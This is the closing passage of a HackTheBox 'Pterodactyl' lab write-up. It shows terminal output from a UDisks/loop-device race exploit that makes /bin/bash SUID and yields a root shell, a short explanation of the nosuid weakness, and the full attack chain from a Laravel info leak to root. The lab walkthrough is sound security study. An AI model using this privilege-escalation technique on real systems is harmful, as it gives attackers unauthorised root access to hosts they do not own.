    udisksctl loop-delete -b $LOOP_DEV 2>/dev/null
fi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
phileasfogg3@pterodactyl:~> vim make_suid.sh
phileasfogg3@pterodactyl:~> chmod +x make_suid.sh 
phileasfogg3@pterodactyl:~> ./make_suid.sh 
[*] Setting up loop device...
[+] Loop device created: /dev/loop0
[*] Starting race loop to chmod /bin/bash...
[*] Triggering Filesystem.Resize...
[*] Checking permissions...

[+] SUCCESS! /bin/bash is now SUID.
lrwxrwxrwx 1 root root 13 Aug 22  2024 /bin/bash -> /usr/bin/bash
[+] Spawning persistent root shell...
bash-4.4# id
uid=1002(phileasfogg3) gid=100(users) euid=0(root) groups=100(users)
bash-4.4#

注:脚本逻辑是利用 /tmp/blockdev*/bash (挂载点内的 bash) 来执行命令。因为挂载没开 nosuid,这个 bash 如果预先被设为 suid root,它执行的 chmod 命令就会以 root 权限运行。

攻击流程:Internet -> HTTP (80) -> Info Leak (Laravel) -> MySQL Creds -> LFI (PEAR) -> RCE (wwwrun) -> DB Dump -> SSH (phileasfogg3) -> PAM/UDisks Exploit -> ROOT.

#HTB
HackTheBox-Pterodactyl
http://example.com/2026/02/09/HackTheBox-Pterodactyl/
Author
Skyarrow
Posted on
February 9, 2026
Licensed under